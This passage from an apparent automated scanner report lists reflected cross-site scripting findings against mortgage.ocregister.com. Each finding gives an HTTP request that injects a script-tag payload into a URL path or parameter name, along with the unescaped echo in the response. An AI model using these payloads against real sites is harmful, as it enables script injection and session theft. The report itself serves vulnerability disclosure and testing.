Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/08/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8d08"><script>alert(1)</script>16a3cd6aa1d was submitted in the REST URL parameter 1. This input was echoed as a8d08\"><script>alert(1)</script>16a3cd6aa1d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008a8d08"><script>alert(1)</script>16a3cd6aa1d/08/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:08 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62642

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008a8d08\"><script>alert(1)</script>16a3cd6aa1d/08/feed/" />
...[SNIP]...

1.266. http://mortgage.ocregister.com/2008/08/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/08/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b270c"><script>alert(1)</script>13e7c115bbc was submitted in the REST URL parameter 2. This input was echoed as b270c\"><script>alert(1)</script>13e7c115bbc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/08b270c"><script>alert(1)</script>13e7c115bbc/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:10 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/08b270c\"><script>alert(1)</script>13e7c115bbc/feed/" />
...[SNIP]...

1.267. http://mortgage.ocregister.com/2008/08/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/08/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d635"><script>alert(1)</script>be7b47f3057 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5d635\"><script>alert(1)</script>be7b47f3057 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/08/?5d635"><script>alert(1)</script>be7b47f3057=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2008 August - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/08/?5d635\"><script>alert(1)</script>be7b47f3057=1feed/" />
...[SNIP]...

1.268. http://mortgage.ocregister.com/2008/08/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/08/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d8d85'><script>alert(1)</script>758d680b117 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d8d85\\\'><script>alert(1)</script>758d680b117 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/08/?d8d85'><script>alert(1)</script>758d680b117=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93022

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<a href='/2008/08/?d8d85\\\'><script>alert(1)</script>758d680b117=1&dem_add_user_answer=true&dem_poll_id=31' rel='nofollow' onclick='return dem_addAnswer(this)' class='dem-add-answer'>
...[SNIP]...

1.269. http://mortgage.ocregister.com/2008/09/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/09/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd248"><script>alert(1)</script>480904c2d4d was submitted in the REST URL parameter 1. This input was echoed as cd248\"><script>alert(1)</script>480904c2d4d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008cd248"><script>alert(1)</script>480904c2d4d/09/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:13 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008cd248\"><script>alert(1)</script>480904c2d4d/09/feed/" />
...[SNIP]...

1.270. http://mortgage.ocregister.com/2008/09/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/09/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c5ee"><script>alert(1)</script>57e09d4d961 was submitted in the REST URL parameter 2. This input was echoed as 4c5ee\"><script>alert(1)</script>57e09d4d961 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/094c5ee"><script>alert(1)</script>57e09d4d961/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:16 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/094c5ee\"><script>alert(1)</script>57e09d4d961/feed/" />
...[SNIP]...

1.271. http://mortgage.ocregister.com/2008/09/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/09/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f1dce'><script>alert(1)</script>c8a81c077b7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f1dce\\\'><script>alert(1)</script>c8a81c077b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/09/?f1dce'><script>alert(1)</script>c8a81c077b7=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 112237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<a href='/2008/09/?f1dce\\\'><script>alert(1)</script>c8a81c077b7=1&dem_add_user_answer=true&dem_poll_id=34' rel='nofollow' onclick='return dem_addAnswer(this)' class='dem-add-answer'>
...[SNIP]...

1.272. http://mortgage.ocregister.com/2008/09/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/09/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e00c"><script>alert(1)</script>73475f88de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2e00c\"><script>alert(1)</script>73475f88de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/09/?2e00c"><script>alert(1)</script>73475f88de=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 112212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2008 September - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/09/?2e00c\"><script>alert(1)</script>73475f88de=1feed/" />
...[SNIP]...

1.273. http://mortgage.ocregister.com/2008/10/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/10/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e3b3"><script>alert(1)</script>c80cc7f5054 was submitted in the REST URL parameter 1. This input was echoed as 7e3b3\"><script>alert(1)</script>c80cc7f5054 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /20087e3b3"><script>alert(1)</script>c80cc7f5054/10/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:09 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20087e3b3\"><script>alert(1)</script>c80cc7f5054/10/feed/" />
...[SNIP]...

1.274. http://mortgage.ocregister.com/2008/10/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/10/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf0d1"><script>alert(1)</script>8fa7ed5b19f was submitted in the REST URL parameter 2. This input was echoed as bf0d1\"><script>alert(1)</script>8fa7ed5b19f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/10bf0d1"><script>alert(1)</script>8fa7ed5b19f/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:12 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/10bf0d1\"><script>alert(1)</script>8fa7ed5b19f/feed/" />
...[SNIP]...

1.275. http://mortgage.ocregister.com/2008/10/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/10/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eae4c"><script>alert(1)</script>170041f3cf9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eae4c\"><script>alert(1)</script>170041f3cf9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/10/?eae4c"><script>alert(1)</script>170041f3cf9=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 110972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2008 October - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/10/?eae4c\"><script>alert(1)</script>170041f3cf9=1feed/" />
...[SNIP]...

1.276. http://mortgage.ocregister.com/2008/11/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/11/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fc1b"><script>alert(1)</script>2d130c53a29 was submitted in the REST URL parameter 1. This input was echoed as 6fc1b\"><script>alert(1)</script>2d130c53a29 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /20086fc1b"><script>alert(1)</script>2d130c53a29/11/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:09 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20086fc1b\"><script>alert(1)</script>2d130c53a29/11/feed/" />
...[SNIP]...

1.277. http://mortgage.ocregister.com/2008/11/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/11/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3cd6"><script>alert(1)</script>c5248f34aad was submitted in the REST URL parameter 2. This input was echoed as b3cd6\"><script>alert(1)</script>c5248f34aad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/11b3cd6"><script>alert(1)</script>c5248f34aad/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:12 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/11b3cd6\"><script>alert(1)</script>c5248f34aad/feed/" />
...[SNIP]...

1.278. http://mortgage.ocregister.com/2008/11/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/11/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59bc7"><script>alert(1)</script>a0f4b09cc80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 59bc7\"><script>alert(1)</script>a0f4b09cc80 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/11/?59bc7"><script>alert(1)</script>a0f4b09cc80=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 109418

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2008 November - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/11/?59bc7\"><script>alert(1)</script>a0f4b09cc80=1feed/" />
...[SNIP]...

1.279. http://mortgage.ocregister.com/2008/12/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/12/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb99f"><script>alert(1)</script>73505128c2a was submitted in the REST URL parameter 1. This input was echoed as fb99f\"><script>alert(1)</script>73505128c2a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008fb99f"><script>alert(1)</script>73505128c2a/12/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
